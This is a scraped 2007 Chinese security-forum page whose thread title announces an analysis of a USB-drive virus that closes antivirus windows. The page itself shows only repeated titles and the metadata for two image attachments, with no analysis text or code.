newcenturymoon 社区嘉宾帖子:15158 注册: 2005-08-03 来自:	分享到：

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口)

随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口)

随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口)

附件:

文件名:5543452007526115912.jpg 下载次数:437 文件类型:image/pjpeg 文件大小: ShowFormatBytesStr(52112); 上传时间:2007-5-26 12:08:34 描述:

附件:

文件名:5543452007526115958.jpg 下载次数:442 文件类型:image/pjpeg 文件大小: ShowFormatBytesStr(67638); 上传时间:2007-5-26 12:09:31 描述:

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛随机8位数字和字母组合的恶性U盘病毒的分析(关闭杀软以及杀毒字样窗口)

文件名:5543452007526115912.jpg

下载次数:437

文件类型:image/pjpeg

文件大小:

上传时间:2007-5-26 12:08:34

描述:

文件名:5543452007526115958.jpg

下载次数:442

文件类型:image/pjpeg

文件大小:

上传时间:2007-5-26 12:09:31

描述: